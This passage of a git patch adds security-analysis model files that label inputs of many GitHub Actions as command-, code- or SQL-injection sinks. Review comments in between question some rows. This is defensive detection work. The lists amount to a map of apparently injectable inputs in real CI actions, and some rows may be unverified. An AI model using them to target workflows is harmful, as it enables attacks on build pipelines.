...er-practice_actions-setup-docker.model.yml | 8 +++++++ ql/lib/ext/docker_build-push-action.model.yml | 6 +++++ ql/lib/ext/endbug_latest-tag.model.yml | 9 +++++++ ql/lib/ext/expo_expo-github-action.model.yml | 7 ++++++ ...seextended_action-hosting-deploy.model.yml | 6 +++++ 
ql/lib/ext/gabrielbb_xvfb-action.model.yml | 7 ++++++ ql/lib/ext/game-ci_unity-builder.model.yml | 7 ++++++ .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 6 +++++ .../ext/go-semantic-release_action.model.yml | 6 +++++ .../golangci_golangci-lint-action.model.yml | 6 +++++ .../ext/gonuit_heroku-docker-deploy.model.yml | 7 ++++++ .../goreleaser_goreleaser-action.model.yml | 6 +++++ ...te-or-update-pull-request-action.model.yml | 9 +++++++ ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 9 +++++++ ql/lib/ext/ilammy_setup-nasm.model.yml | 7 ++++++ ql/lib/ext/imjohnbo_issue-bot.model.yml | 8 +++++++ ql/lib/ext/iterative_setup-cml.model.yml | 6 +++++ ql/lib/ext/iterative_setup-dvc.model.yml | 6 +++++ ...sives_github-pages-deploy-action.model.yml | 11 +++++++++ .../ext/johnnymorganz_stylua-action.model.yml | 6 +++++ .../ext/jurplel_install-qt-action.model.yml | 11 +++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 7 ++++++ ql/lib/ext/leafo_gh-actions-lua.model.yml | 7 ++++++ .../ext/leafo_gh-actions-luarocks.model.yml | 6 +++++ .../lucasbento_auto-close-issues.model.yml | 6 +++++ ql/lib/ext/magefile_mage-action.model.yml | 6 +++++ ql/lib/ext/maierj_fastlane-action.model.yml | 8 +++++++ .../manusa_actions-setup-minikube.model.yml | 9 +++++++ ql/lib/ext/mattdavis0351_actions.model.yml | 9 +++++++ .../ext/meteorengineer_setup-meteor.model.yml | 6 +++++ ql/lib/ext/microsoft_setup-msbuild.model.yml | 7 ++++++ ...hers-excellent_docker-build-push.model.yml | 16 +++++++++++++ ql/lib/ext/msys2_setup-msys2.model.yml | 7 ++++++ ql/lib/ext/mxschmitt_action-tmate.model.yml | 7 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +++++ .../ext/nanasess_setup-chromedriver.model.yml | 6 +++++ ql/lib/ext/nanasess_setup-php.model.yml | 6 +++++ ql/lib/ext/nick-fields_retry.model.yml | 8 +++++++ ql/lib/ext/octokit_graphql-action.model.yml | 6 +++++ ql/lib/ext/octokit_request-action.model.yml | 6 +++++ ql/lib/ext/olafurpg_setup-scala.model.yml 
| 6 +++++ .../paambaati_codeclimate-action.model.yml | 6 +++++ .../peter-evans_create-pull-request.model.yml | 6 +++++ .../ext/plasmicapp_plasmic-action.model.yml | 8 +++++++ .../preactjs_compressed-size-action.model.yml | 7 ++++++ ql/lib/ext/py-actions_flake8.model.yml | 12 ++++++++++ ...py-actions_py-dependency-install.model.yml | 6 +++++ ql/lib/ext/pyo3_maturin-action.model.yml | 9 +++++++ ...vecircus_android-emulator-runner.model.yml | 24 +++++++++++++++++++ ql/lib/ext/reggionick_s3-deploy.model.yml | 13 ++++++++++ .../ext/renovatebot_github-action.model.yml | 10 ++++++++ .../ext/roots_issue-closer-action.model.yml | 7 ++++++ ql/lib/ext/ros-tooling_setup-ros.model.yml | 6 +++++ ql/lib/ext/ruby_setup-ruby.model.yml | 5 ++++ ...ction-detect-and-tag-new-version.model.yml | 5 ++++ ...skitionek_notify-microsoft-teams.model.yml | 6 +++++ ql/lib/ext/snow-actions_eclint.model.yml | 6 +++++ .../ext/stackhawk_hawkscan-action.model.yml | 10 ++++++++ .../ext/step-security_harden-runner.model.yml | 6 +++++ ql/lib/ext/tibdex_backport.model.yml | 9 +++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 15 ++++++++++++ .../tryghost_action-deploy-theme.model.yml | 7 ++++++ ql/lib/ext/veracode_veracode-sca.model.yml | 9 +++++++ .../ext/wearerequired_lint-action.model.yml | 8 +++++++ ql/lib/ext/webfactory_ssh-agent.model.yml | 8 +++++++ ql/lib/ext/zaproxy_action-baseline.model.yml | 9 +++++++ ql/lib/ext/zaproxy_action-full-scan.model.yml | 9 +++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 ++- 99 files changed, 719 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/8398a7_action-slack.model.yml create mode 100644 ql/lib/ext/amannn_action-semantic-pull-request.model.yml create mode 100644 ql/lib/ext/anchore_sbom-action.model.yml create mode 100644 ql/lib/ext/anchore_scan-action.model.yml create mode 100644 ql/lib/ext/andresz1_size-limit-action.model.yml create mode 100644 ql/lib/ext/asdf-vm_actions.model.yml 
create mode 100644 ql/lib/ext/axel-op_googlejavaformat-action.model.yml create mode 100644 ql/lib/ext/azure_powershell.model.yml create mode 100644 ql/lib/ext/bahmutov_npm-install.model.yml create mode 100644 ql/lib/ext/blackducksoftware_github-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-setup-action.model.yml create mode 100644 ql/lib/ext/changesets_action.model.yml create mode 100644 ql/lib/ext/cloudflare_wrangler-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml create mode 100644 ql/lib/ext/cycjimmy_semantic-release-action.model.yml create mode 100644 ql/lib/ext/cypress-io_github-action.model.yml create mode 100644 ql/lib/ext/dailydotdev_action-devcard.model.yml create mode 100644 ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml create mode 100644 ql/lib/ext/daspn_private-actions-checkout.model.yml create mode 100644 ql/lib/ext/dawidd6_action-ansible-playbook.model.yml create mode 100644 ql/lib/ext/dawidd6_action-download-artifact.model.yml create mode 100644 ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml create mode 100644 ql/lib/ext/docker-practice_actions-setup-docker.model.yml create mode 100644 ql/lib/ext/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/endbug_latest-tag.model.yml create mode 100644 ql/lib/ext/expo_expo-github-action.model.yml create mode 100644 ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml create mode 100644 ql/lib/ext/gabrielbb_xvfb-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-builder.model.yml create mode 100644 ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml create mode 100644 ql/lib/ext/go-semantic-release_action.model.yml create mode 100644 ql/lib/ext/golangci_golangci-lint-action.model.yml create mode 100644 ql/lib/ext/gonuit_heroku-docker-deploy.model.yml create mode 100644 ql/lib/ext/goreleaser_goreleaser-action.model.yml create mode 100644 
ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml create mode 100644 ql/lib/ext/ilammy_msvc-dev-cmd.model.yml create mode 100644 ql/lib/ext/ilammy_setup-nasm.model.yml create mode 100644 ql/lib/ext/imjohnbo_issue-bot.model.yml create mode 100644 ql/lib/ext/iterative_setup-cml.model.yml create mode 100644 ql/lib/ext/iterative_setup-dvc.model.yml create mode 100644 ql/lib/ext/jamesives_github-pages-deploy-action.model.yml create mode 100644 ql/lib/ext/johnnymorganz_stylua-action.model.yml create mode 100644 ql/lib/ext/jurplel_install-qt-action.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-lua.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-luarocks.model.yml create mode 100644 ql/lib/ext/lucasbento_auto-close-issues.model.yml create mode 100644 ql/lib/ext/magefile_mage-action.model.yml create mode 100644 ql/lib/ext/maierj_fastlane-action.model.yml create mode 100644 ql/lib/ext/manusa_actions-setup-minikube.model.yml create mode 100644 ql/lib/ext/meteorengineer_setup-meteor.model.yml create mode 100644 ql/lib/ext/microsoft_setup-msbuild.model.yml create mode 100644 ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml create mode 100644 ql/lib/ext/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/mxschmitt_action-tmate.model.yml create mode 100644 ql/lib/ext/nanasess_setup-chromedriver.model.yml create mode 100644 ql/lib/ext/nanasess_setup-php.model.yml create mode 100644 ql/lib/ext/nick-fields_retry.model.yml create mode 100644 ql/lib/ext/octokit_graphql-action.model.yml create mode 100644 ql/lib/ext/octokit_request-action.model.yml create mode 100644 ql/lib/ext/olafurpg_setup-scala.model.yml create mode 100644 ql/lib/ext/paambaati_codeclimate-action.model.yml create mode 100644 ql/lib/ext/peter-evans_create-pull-request.model.yml create mode 100644 ql/lib/ext/plasmicapp_plasmic-action.model.yml create mode 100644 ql/lib/ext/preactjs_compressed-size-action.model.yml create mode 100644 
ql/lib/ext/py-actions_flake8.model.yml create mode 100644 ql/lib/ext/py-actions_py-dependency-install.model.yml create mode 100644 ql/lib/ext/pyo3_maturin-action.model.yml create mode 100644 ql/lib/ext/reactivecircus_android-emulator-runner.model.yml create mode 100644 ql/lib/ext/reggionick_s3-deploy.model.yml create mode 100644 ql/lib/ext/renovatebot_github-action.model.yml create mode 100644 ql/lib/ext/roots_issue-closer-action.model.yml create mode 100644 ql/lib/ext/ros-tooling_setup-ros.model.yml create mode 100644 ql/lib/ext/skitionek_notify-microsoft-teams.model.yml create mode 100644 ql/lib/ext/snow-actions_eclint.model.yml create mode 100644 ql/lib/ext/stackhawk_hawkscan-action.model.yml create mode 100644 ql/lib/ext/step-security_harden-runner.model.yml create mode 100644 ql/lib/ext/tibdex_backport.model.yml create mode 100644 ql/lib/ext/tripss_conventional-changelog-action.model.yml create mode 100644 ql/lib/ext/tryghost_action-deploy-theme.model.yml create mode 100644 ql/lib/ext/veracode_veracode-sca.model.yml create mode 100644 ql/lib/ext/wearerequired_lint-action.model.yml create mode 100644 ql/lib/ext/webfactory_ssh-agent.model.yml create mode 100644 ql/lib/ext/zaproxy_action-baseline.model.yml create mode 100644 ql/lib/ext/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml new file mode 100644 index 00000000000..e3d97adf69d --- /dev/null +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 2ed2e03a34e..cd409f38b59 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml 
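Review bot: The sink row gives no evidence for why `input.custom_payload` is a `code-injection` sink, and the version column `*` applies it to every release of the action; the other model files added in this commit follow the same pattern. A reviewer cannot verify the rows across 99 files without the place in each action's source where the input is evaluated, and a release that fixes the handling would still be flagged. Suggest a comment per row such as `# sink evidence: <link to the line in the action source that evaluates custom_payload>`.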
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script","*","input.script","expression-injection"] + - ["actions/github-script", "*", "input.script", "code-injection"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index f370a9fe222..ad65775e58d 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -4,3 +4,18 @@ extensions: extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml new file mode 100644 index 00000000000..c530a3af9b3 --- /dev/null +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"]
diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml
new file mode 100644
index 00000000000..c632a3a1ff2
--- /dev/null
+++ b/ql/lib/ext/anchore_sbom-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.format", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.path", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.file", "command-injection"]
+ - ["anchore/sbom-action", "*", "input.image", "command-injection"]
diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml
new file mode 100644
index 00000000000..26e5adea505
--- /dev/null
+++ b/ql/lib/ext/anchore_scan-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["anchore/scan-action", "*", "input.grype-version", "command-injection"]
diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml
new file mode 100644
index 00000000000..2903888a731
--- /dev/null
+++ b/ql/lib/ext/andresz1_size-limit-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"]
+ - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"]
+ - ["andresz1/size-limit-action", "*", "input.script", "command-injection"]
+ - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"]
diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml
new file mode 100644
index 00000000000..21dcd22c8b7
--- /dev/null
+++ b/ql/lib/ext/asdf-vm_actions.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["asdf-vm/actions", "*", "input.before_install", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
new file mode 100644
index 00000000000..236eade34a6
--- /dev/null
+++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"]
+ - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"]
diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml
new file mode 100644
index 00000000000..c0e11c8201f
--- /dev/null
+++ b/ql/lib/ext/azure_powershell.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["azure/powershell", "*", "input.azPSVersion", "command-injection"]
diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml
new file mode 100644
index 00000000000..2841f406bda
--- /dev/null
+++ b/ql/lib/ext/bahmutov_npm-install.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"]
diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml
new file mode 100644
index 00000000000..aa060de610d
--- /dev/null
+++ b/ql/lib/ext/blackducksoftware_github-action.model.yml
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["blackducksoftware/github-action", "*", "input.args", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index ee8e6abef09..7d5f699a0e9 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index c58b5a1e1d2..aeda7998631 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml new file mode 100644 index 00000000000..38b18cf6cac --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml 
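Review bot: The rows `input.blackduck.url` and `input.blackduck.api.token` in blackducksoftware_github-action.model.yml have dots inside the input name, unlike every other row on this page, which uses a single `input.<name>` segment. The code that parses the third column is not part of this diff. If it splits on `.` or captures only up to the next dot, these two rows would resolve to an input named `blackduck` and never match a workflow. A test workflow that sets `blackduck.url` under `with:` would confirm the rows are picked up, and a comment above them such as `# input names contain dots; matched verbatim after the "input." prefix` would record the intent.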
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 1c6584eb9d5..2e4291eb480 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml new file mode 100644 index 00000000000..3be7669275c --- /dev/null +++ b/ql/lib/ext/changesets_action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["changesets/action", "*", "input.publish", "command-injection"] + - ["changesets/action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml new file mode 100644 index 00000000000..cb0870b4883 --- /dev/null +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"] 
diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml new file mode 100644 index 00000000000..30e59e91d60 --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index d4e35196c6c..f3b021d226b 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml new file mode 100644 index 00000000000..25df02dacaa --- /dev/null +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml new file mode 100644 index 00000000000..2fda092f20a --- /dev/null +++ b/ql/lib/ext/cypress-io_github-action.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"]
diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml
new file mode 100644
index 00000000000..324171f3c4b
--- /dev/null
+++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"]
+ - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"]
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
new file mode 100644
index 00000000000..cc5c311eea7
--- /dev/null
+++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"]
diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml
new file mode 100644
index 00000000000..f45aae02158
--- /dev/null
+++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"]
+ - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"]
diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
new file mode 100644
index 00000000000..7445d673fcf
--- /dev/null
+++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
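Review bot: The kind `sql-injection` on `input.commit_branch` and `input.commit_filename` in dailydotdev_action-devcard.model.yml looks like a slip. It is the only use of that kind in this part of the patch, and the input names suggest values passed to git rather than to a database. If no query selects sinks of kind `sql-injection`, untrusted data reaching these inputs would produce no alert at all. Unless the action really builds SQL from them, the rows would read `- ["dailydotdev/action-devcard", "*", "input.commit_branch", "command-injection"]` and likewise for `input.commit_filename`; otherwise a comment naming the query that consumes `sql-injection` would help.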
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml new file mode 100644 index 00000000000..a8a54dbda29 --- /dev/null +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 2aa6013c872..82f491390d2 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml new file mode 100644 index 00000000000..430a96f6cbe --- /dev/null +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml 
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
new file mode 100644
index 00000000000..37bcf2cc781
--- /dev/null
+++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"]
diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml
new file mode 100644
index 00000000000..77eaf3ae10f
--- /dev/null
+++ b/ql/lib/ext/docker_build-push-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["docker/build-push-action", "*", "input.context", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml
new file mode 100644
index 00000000000..63cdb2a496b
--- /dev/null
+++ b/ql/lib/ext/endbug_latest-tag.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["endbug/latest-tag", "*", "input.ref", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.description", "command-injection"]
diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml
new file mode 100644
index 00000000000..d0bcbb4da98
--- /dev/null
+++ b/ql/lib/ext/expo_expo-github-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["expo/expo-github-action", "*", "input.command", "command-injection"]
+ - ["expo/expo-github-action", "*", "input.packager", "command-injection"]
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
new file mode 100644
index 00000000000..6418e71f22a
--- /dev/null
+++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
